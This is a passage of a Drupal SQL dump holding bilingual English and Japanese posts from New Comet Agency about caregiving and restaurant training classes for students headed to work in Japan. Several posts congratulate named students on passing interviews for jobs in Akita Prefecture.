data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-ce1c8a821f40a67c1754a52f0495edaca6deafb497fd6b38ae4235b8b7b765f7_c28078628e919758.jpg\" data-entity-uuid=\"7def92f4-2793-4d57-84d8-3f641d7c91ff\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\">&nbsp;</div><div class=\"flex w-full items-center\"><div class=\"overflow-hidden [&amp;:has(textarea:focus)]:border-token-border-xheavy [&amp;:has(textarea:focus)]:shadow-[0_2px_6px_rgba(0,0,0,.05)] flex flex-col w-full flex-grow relative border dark:text-white rounded-2xl bg-token-main-surface-primary border-token-border-medium\">&nbsp;</div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 136, 570, 'en', 0, '<blockquote><h2>Pratical Nursing Class</h2></blockquote><p>At New Comet Agency, we provide comprehensive training not only for students who have successfully passed restaurant interviews but also for those who have passed Kaigo interviews. Our approach ensures that all students, guided by both native-speaking and experienced instructors, gain practical experience to thrive in their respective workplaces without encountering difficulties.Upon completing the course, students undergo practical training at elderly care centers, where they acquire invaluable workplace experience. With instruction from native-speaking teachers, our students gain confidence in Japanese language proficiency, eliminating any potential challenges. New Comet Agency is committed to facilitating these arrangements for our students\' success.</p><img src=\"/sites/default/files/inline-images/0-02-01-8ef5e64f31d9615be92bd0062cb573b06ee4bee9789cbe58d0f127033a97175e_6f23e588bd15393e.jpg\" data-entity-uuid=\"eed24d54-c86c-416b-98f7-09dea845ac1c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-09e7d07cc2ecc4a33fdb2f8f617a02333246cdf67ac391d823e3fd50027af130_b18fd9e88b2b2edd.jpg\" data-entity-uuid=\"37414a98-8104-454b-b331-19bcbe023fcf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-92f9bd40908c232e37f43e2325a73908f1735f37074c401c18d502f3cced7655_ab037e0fc22ee60f.jpg\" data-entity-uuid=\"e4cc71ad-759c-42b4-badd-66e931638690\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-365bbd1dfc22640a05b723c606ec9efef65bfb227024834ee841ef15f43fdfac_6c86b8d1b645de64.jpg\" data-entity-uuid=\"625a7ae1-0d02-42dc-bdfe-4e20ab2c9149\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-802c3591cb73b236e3fbe0ccefffffa6c191429453a6aa0ae62c5f31fc55ce0d_5bd9c7a49dd2a4ce.jpg\" data-entity-uuid=\"54621e25-04ce-406d-b67e-f85a318f30d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-a96a827d143694f86f612460909a06bacd3ae0ebac5eb6ac6f9db603323a2a5a_32c913cf07297e81.jpg\" data-entity-uuid=\"ec2abf47-c859-4a6f-89de-fff4bd70d39e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-b72d45b080bf0a2772e499b2d107f2cf257ea99199ef0130841d7b4018c7950a_cb0f1c5055b5693c.jpg\" data-entity-uuid=\"e21aefc0-db24-4dd7-a5b3-5bc66d146b51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f4bc37fab26942147926f868f6cc298d4e073ff11095ebc1d6afa653cd365c3e_a1637f152c67c3f0.jpg\" data-entity-uuid=\"fd78dfb2-013a-4c12-ab48-e8b0d08df4f9\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 136, 571, 'en', 0, '<blockquote><h2>Pratical Nursing Class</h2></blockquote><p>At New Comet Agency, we provide comprehensive training not only for students who have successfully passed restaurant interviews but also for those who have passed Kaigo interviews. Our approach ensures that all students, guided by both native-speaking and experienced instructors, gain practical experience to thrive in their respective workplaces without encountering difficulties.Upon completing the course, students undergo practical training at elderly care centers, where they acquire invaluable workplace experience. With instruction from native-speaking teachers, our students gain confidence in Japanese language proficiency, eliminating any potential challenges. New Comet Agency is committed to facilitating these arrangements for our students\' success.</p><img src=\"/sites/default/files/inline-images/0-02-01-8ef5e64f31d9615be92bd0062cb573b06ee4bee9789cbe58d0f127033a97175e_6f23e588bd15393e.jpg\" data-entity-uuid=\"eed24d54-c86c-416b-98f7-09dea845ac1c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-09e7d07cc2ecc4a33fdb2f8f617a02333246cdf67ac391d823e3fd50027af130_b18fd9e88b2b2edd.jpg\" data-entity-uuid=\"37414a98-8104-454b-b331-19bcbe023fcf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-92f9bd40908c232e37f43e2325a73908f1735f37074c401c18d502f3cced7655_ab037e0fc22ee60f.jpg\" data-entity-uuid=\"e4cc71ad-759c-42b4-badd-66e931638690\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-365bbd1dfc22640a05b723c606ec9efef65bfb227024834ee841ef15f43fdfac_6c86b8d1b645de64.jpg\" data-entity-uuid=\"625a7ae1-0d02-42dc-bdfe-4e20ab2c9149\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-802c3591cb73b236e3fbe0ccefffffa6c191429453a6aa0ae62c5f31fc55ce0d_5bd9c7a49dd2a4ce.jpg\" data-entity-uuid=\"54621e25-04ce-406d-b67e-f85a318f30d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-a96a827d143694f86f612460909a06bacd3ae0ebac5eb6ac6f9db603323a2a5a_32c913cf07297e81.jpg\" data-entity-uuid=\"ec2abf47-c859-4a6f-89de-fff4bd70d39e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-b72d45b080bf0a2772e499b2d107f2cf257ea99199ef0130841d7b4018c7950a_cb0f1c5055b5693c.jpg\" data-entity-uuid=\"e21aefc0-db24-4dd7-a5b3-5bc66d146b51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f4bc37fab26942147926f868f6cc298d4e073ff11095ebc1d6afa653cd365c3e_a1637f152c67c3f0.jpg\" data-entity-uuid=\"fd78dfb2-013a-4c12-ab48-e8b0d08df4f9\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 136, 571, 'ja', 0, '<blockquote><h2>実習看護クラス</h2><p>ニューコメットエージェンシーでは、レストランの面接に合格した学生だけでなく、介護の面接に合格した学生にも包括的なトレーニングを提供しています。私たちのアプローチでは、ネイティブスピーカーと経験豊富なインストラクターの両方の指導により、すべての学生がそれぞれの職場で困難に遭遇することなく活躍するための実践的な経験を積むことを保証します。コース修了後、学生は高齢者介護施設で実習を受け、貴重な職場経験を積むことができます。ネイティブスピーカーの教師の指導により、学生は日本語能力に自信を持ち、潜在的な問題を排除します。ニューコメットエージェンシーは、学生の成功のためにこれらの手配を促進することに尽力しています。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-8ef5e64f31d9615be92bd0062cb573b06ee4bee9789cbe58d0f127033a97175e_6f23e588bd15393e.jpg\" data-entity-uuid=\"eed24d54-c86c-416b-98f7-09dea845ac1c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-09e7d07cc2ecc4a33fdb2f8f617a02333246cdf67ac391d823e3fd50027af130_b18fd9e88b2b2edd.jpg\" data-entity-uuid=\"37414a98-8104-454b-b331-19bcbe023fcf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-92f9bd40908c232e37f43e2325a73908f1735f37074c401c18d502f3cced7655_ab037e0fc22ee60f.jpg\" data-entity-uuid=\"e4cc71ad-759c-42b4-badd-66e931638690\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-365bbd1dfc22640a05b723c606ec9efef65bfb227024834ee841ef15f43fdfac_6c86b8d1b645de64.jpg\" data-entity-uuid=\"625a7ae1-0d02-42dc-bdfe-4e20ab2c9149\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-802c3591cb73b236e3fbe0ccefffffa6c191429453a6aa0ae62c5f31fc55ce0d_5bd9c7a49dd2a4ce.jpg\" data-entity-uuid=\"54621e25-04ce-406d-b67e-f85a318f30d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-a96a827d143694f86f612460909a06bacd3ae0ebac5eb6ac6f9db603323a2a5a_32c913cf07297e81.jpg\" data-entity-uuid=\"ec2abf47-c859-4a6f-89de-fff4bd70d39e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-b72d45b080bf0a2772e499b2d107f2cf257ea99199ef0130841d7b4018c7950a_cb0f1c5055b5693c.jpg\" data-entity-uuid=\"e21aefc0-db24-4dd7-a5b3-5bc66d146b51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f4bc37fab26942147926f868f6cc298d4e073ff11095ebc1d6afa653cd365c3e_a1637f152c67c3f0.jpg\" data-entity-uuid=\"fd78dfb2-013a-4c12-ab48-e8b0d08df4f9\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 137, 572, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to&nbsp;</p><ul><li>NANG BWAR KYI</li><li>PHRAY MYAR</li><li>KAW MYAR</li></ul><p>For passing the Interview for TOKUTEI KAIGO to work at AKITA Prefecture , JAPAN!&nbsp;</p><img data-entity-uuid=\"7f53d639-b584-4ee0-b277-c440cdca648c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAW%20MYAR_0.jpg\"><img data-entity-uuid=\"c03f9127-c9cd-4498-a15f-ca1164aae27e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NAN%20BWAR%20KYI_0.jpg\"><img data-entity-uuid=\"6631104e-9fd6-45e0-b354-c85cb8a506d3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PHRAY%20MYAR.jpg\">', '', 'full_html'),
('activities', 0, 137, 573, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to&nbsp;</p><ul><li>NANG BWAR KYI</li><li>PHRAY MYAR</li><li>KAW MYAR</li></ul><p>For passing the Interview for TOKUTEI KAIGO to work at AKITA Prefecture , JAPAN!&nbsp;</p><img data-entity-uuid=\"7f53d639-b584-4ee0-b277-c440cdca648c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAW%20MYAR_0.jpg\"><img data-entity-uuid=\"c03f9127-c9cd-4498-a15f-ca1164aae27e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NAN%20BWAR%20KYI_0.jpg\"><img data-entity-uuid=\"6631104e-9fd6-45e0-b354-c85cb8a506d3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PHRAY%20MYAR.jpg\">', '', 'full_html'),
('activities', 0, 137, 573, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>おめでとうございます</p><ul><li>NANG BWAR KYI</li><li>PHRAY MYAR</li><li>KAW MYAR</li></ul><p>秋田県で働くための TOKUTEI KAIGO の面接に合格しました!</p><img src=\"/sites/default/files/inline-images/KAW%20MYAR_0.jpg\" data-entity-uuid=\"7f53d639-b584-4ee0-b277-c440cdca648c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NAN%20BWAR%20KYI_0.jpg\" data-entity-uuid=\"c03f9127-c9cd-4498-a15f-ca1164aae27e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/PHRAY%20MYAR.jpg\" data-entity-uuid=\"6631104e-9fd6-45e0-b354-c85cb8a506d3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 138, 574, 'en', 0, '<blockquote><h2>1st Batch Speaking and Pratical Class Completion</h2></blockquote><p>At New Comet Agency, candidates preparing for Tokutei Gaishoku (restaurant) interviews receive instruction from experienced teachers through small group activities and written exercises. This approach ensures that successful candidates not only pass through New Comet but also gain practical speaking skills and relevant experience.Moreover, to alleviate language apprehension in foreign environments, we offer small Kaiwa (conversation) classes facilitated by native speakers to practice Japanese accents.Currently, our priority is to support interview-passers by mitigating potential challenges they may encounter.</p><img data-entity-uuid=\"33f710f1-5bc7-4953-b3a1-647e720033bb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-3db9f1e152ae40301bf405613f7fc81da76de2bae6a9bc2d831f3bf2098e3250_52ed44063c111889.jpg\"><img data-entity-uuid=\"56f49323-5396-464d-87d3-c53de426a854\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-29abc5f252e55a8d95cfc21e8d3e1e89ff008af97840dc9ea94439dcb8c1eea8_48eefd971798704f.jpg\"><img data-entity-uuid=\"ee9c451d-645e-41e3-9d74-50cd0e4db3cd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-93dd603e1138ce4c2847f2374b6685bf6a93e845c13d0a3d88517892615ee3f8_df8fe7fcd11e5c88.jpg\"><img data-entity-uuid=\"b9e7e674-f81e-44b8-bd2a-f713827ea67f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-726cd799088309125071ada3493c8916f09a9a3d4dcc1d1c648e9fba28d4b86b_18a17c8d2b659cb2.jpg\"><img data-entity-uuid=\"a391f211-0fe9-4a2f-9ada-b69aad45aa2c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-78854bc3e37663c1d709d4ead49f9deac1a95b3cf1a4c3ef6c1b30bb62da47b4_b45383810d3befe5.jpg\"><img data-entity-uuid=\"98aeb3b5-9a9f-4098-b224-4b0617f588ea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f59a39b0db5a48f439f63370be80340d1135254e5e148839febceb9671221a5c_4779530b8c62bd68.jpg\"><img data-entity-uuid=\"318bdaed-2485-4a85-a845-556e6bdeeef6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f59e6582577d6d68dd96f767e18c949ad4dff7c621015a53de567f7259ccadd8_69b48dc6c8534d76.jpg\"><img data-entity-uuid=\"e962ee0c-3e11-461f-80a5-8237f400c650\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f2746a0f468e5c40d02bcc22d7554498d15ff418240398570de70d844f402b80_19733c8ce43833e7.jpg\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 138, 575, 'en', 0, '<blockquote><h2>1st Batch Speaking and Pratical Class Completion</h2></blockquote><p>At New Comet Agency, candidates preparing for Tokutei Gaishoku (restaurant) interviews receive instruction from experienced teachers through small group activities and written exercises. This approach ensures that successful candidates not only pass through New Comet but also gain practical speaking skills and relevant experience.Moreover, to alleviate language apprehension in foreign environments, we offer small Kaiwa (conversation) classes facilitated by native speakers to practice Japanese accents.Currently, our priority is to support interview-passers by mitigating potential challenges they may encounter.</p><img data-entity-uuid=\"33f710f1-5bc7-4953-b3a1-647e720033bb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-3db9f1e152ae40301bf405613f7fc81da76de2bae6a9bc2d831f3bf2098e3250_52ed44063c111889.jpg\"><img data-entity-uuid=\"56f49323-5396-464d-87d3-c53de426a854\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-29abc5f252e55a8d95cfc21e8d3e1e89ff008af97840dc9ea94439dcb8c1eea8_48eefd971798704f.jpg\"><img data-entity-uuid=\"ee9c451d-645e-41e3-9d74-50cd0e4db3cd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-93dd603e1138ce4c2847f2374b6685bf6a93e845c13d0a3d88517892615ee3f8_df8fe7fcd11e5c88.jpg\"><img data-entity-uuid=\"b9e7e674-f81e-44b8-bd2a-f713827ea67f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-726cd799088309125071ada3493c8916f09a9a3d4dcc1d1c648e9fba28d4b86b_18a17c8d2b659cb2.jpg\"><img data-entity-uuid=\"a391f211-0fe9-4a2f-9ada-b69aad45aa2c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-78854bc3e37663c1d709d4ead49f9deac1a95b3cf1a4c3ef6c1b30bb62da47b4_b45383810d3befe5.jpg\"><img data-entity-uuid=\"98aeb3b5-9a9f-4098-b224-4b0617f588ea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f59a39b0db5a48f439f63370be80340d1135254e5e148839febceb9671221a5c_4779530b8c62bd68.jpg\"><img data-entity-uuid=\"318bdaed-2485-4a85-a845-556e6bdeeef6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f59e6582577d6d68dd96f767e18c949ad4dff7c621015a53de567f7259ccadd8_69b48dc6c8534d76.jpg\"><img data-entity-uuid=\"e962ee0c-3e11-461f-80a5-8237f400c650\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f2746a0f468e5c40d02bcc22d7554498d15ff418240398570de70d844f402b80_19733c8ce43833e7.jpg\">', '', 'full_html'),
('activities', 0, 138, 575, 'ja', 0, '<blockquote><h2>第 1 バッチのスピーキングと実技クラス修了</h2><p>ニューコメット エージェンシーでは、特定外食 (レストラン) 面接の準備をしている候補者は、小グループ活動や筆記練習を通じて経験豊富な講師から指導を受けます。このアプローチにより、合格者はニューコメットに合格するだけでなく、実践的なスピーキング スキルと関連経験も身に付けることができます。さらに、外国の環境での言語不安を軽減するために、ネイティブ スピーカーが日本語のアクセントを練習する少人数制の会話クラスを提供しています。現在、私たちの優先事項は、面接合格者が遭遇する可能性のある潜在的な課題を軽減してサポートすることです。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-3db9f1e152ae40301bf405613f7fc81da76de2bae6a9bc2d831f3bf2098e3250_52ed44063c111889.jpg\" data-entity-uuid=\"33f710f1-5bc7-4953-b3a1-647e720033bb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-29abc5f252e55a8d95cfc21e8d3e1e89ff008af97840dc9ea94439dcb8c1eea8_48eefd971798704f.jpg\" data-entity-uuid=\"56f49323-5396-464d-87d3-c53de426a854\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-93dd603e1138ce4c2847f2374b6685bf6a93e845c13d0a3d88517892615ee3f8_df8fe7fcd11e5c88.jpg\" data-entity-uuid=\"ee9c451d-645e-41e3-9d74-50cd0e4db3cd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-726cd799088309125071ada3493c8916f09a9a3d4dcc1d1c648e9fba28d4b86b_18a17c8d2b659cb2.jpg\" data-entity-uuid=\"b9e7e674-f81e-44b8-bd2a-f713827ea67f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-78854bc3e37663c1d709d4ead49f9deac1a95b3cf1a4c3ef6c1b30bb62da47b4_b45383810d3befe5.jpg\" data-entity-uuid=\"a391f211-0fe9-4a2f-9ada-b69aad45aa2c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f59a39b0db5a48f439f63370be80340d1135254e5e148839febceb9671221a5c_4779530b8c62bd68.jpg\" data-entity-uuid=\"98aeb3b5-9a9f-4098-b224-4b0617f588ea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f59e6582577d6d68dd96f767e18c949ad4dff7c621015a53de567f7259ccadd8_69b48dc6c8534d76.jpg\" data-entity-uuid=\"318bdaed-2485-4a85-a845-556e6bdeeef6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f2746a0f468e5c40d02bcc22d7554498d15ff418240398570de70d844f402b80_19733c8ce43833e7.jpg\" data-entity-uuid=\"e962ee0c-3e11-461f-80a5-8237f400c650\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 139, 576, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to HNIN WAH KHAING &amp; LAY LAY NAING for passing the Interview for TOKUTEI KAIGO to work at AKITA Prefecture, JAPAN!&nbsp;</p><img data-entity-uuid=\"28362b21-6b14-4783-8093-84b7f8766272\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20WAH%20KHAING_0.jpg\"><img data-entity-uuid=\"2fe33baf-5da2-4bd0-9f6c-db7463491c6c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/LAY%20LAY%20NAING_0.jpg\">', '', 'full_html'),
('activities', 0, 139, 577, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to HNIN WAH KHAING &amp; LAY LAY NAING for passing the Interview for TOKUTEI KAIGO to work at AKITA Prefecture, JAPAN!&nbsp;</p><img data-entity-uuid=\"28362b21-6b14-4783-8093-84b7f8766272\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20WAH%20KHAING_0.jpg\"><img data-entity-uuid=\"2fe33baf-5da2-4bd0-9f6c-db7463491c6c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/LAY%20LAY%20NAING_0.jpg\">', '', 'full_html'),
('activities', 0, 139, 577, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>HNIN WAH KHAING さん</strong>と <strong>LAY LAY NAING さん</strong>が、秋田県で働くための TOKUTEI KAIGO の面接に合格しました。おめでとうございます!</p><img src=\"/sites/default/files/inline-images/HNIN%20WAH%20KHAING_0.jpg\" data-entity-uuid=\"28362b21-6b14-4783-8093-84b7f8766272\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/LAY%20LAY%20NAING_0.jpg\" data-entity-uuid=\"2fe33baf-5da2-4bd0-9f6c-db7463491c6c\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 140, 578, 'en', 0, '<blockquote><h2>1st Batch Theoretical Class For 15 Students</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-11\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"7ccdedbb-c0ce-4970-8404-33a9702e7c83\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>Congratulations to all the children who have successfully passed the restaurant interview! In the new year, practical training will commence for 15 children based on the principles of success. Your hard work has paid off, and we commend your achievements. As you prepare to embark on this journey, we encourage you to continue your dedication. The classes are designed to equip you with essential workplace skills, so attendance is crucial. We look forward to seeing your continued progress and success in Japan.</p><img data-entity-uuid=\"652fd1b8-ec3f-4136-abb6-6af35c9c5874\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-45c4e9e998df6671bd77e672d9292fbee765ea62536ec837a00765efce79fc7e_c1fdb88868297dba.jpg\"><img data-entity-uuid=\"84103d30-1c8c-4a95-a703-5391e41d952d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-51ec7f4be81257f4ff2f721c5e084cb4cc382b2ec8cfcecae01d41a9e7c09e03_4b7c3a49166d492a.jpg\"><img data-entity-uuid=\"ea362f9f-07a8-43d7-904b-2d6cd4a8153b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-69d282081f3119be288d94bc0b4bb61ad1f17e8eaed3c08ca009c6a4de5dc75d_1383d6ddf8fe814d.jpg\"><img data-entity-uuid=\"177fde09-e74e-4cdf-80b2-3256275746b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-724f082ab41be8e90d111399939af2f3d1a97e05877c69bff3284b02b5e1e4dd_5a389926988927bf.jpg\"><img data-entity-uuid=\"e394765a-6b85-4041-b003-780d2cdd58df\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-8033bc061c22ecda23a89cf99e7992d6788c3646c3972cfa22bcb78eddde2fd6_fc06ba5dae001c97.jpg\"><img data-entity-uuid=\"4404215d-4446-4952-b7fa-5cfe1f9d033b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-dad82938c3dc5bcbb853785ca4f388b1d3b1e5037a480a3ae260f8f6dee0ccea_42f956a550769234.jpg\"><img data-entity-uuid=\"23e3cb3a-b366-49e5-9456-59fe851e2a7e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-e6873cecbff4a19760cd209a7c4637d87ccaa857f5e00cf4acc717ab93afbe9f_fdb5e83019029c3c.jpg\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 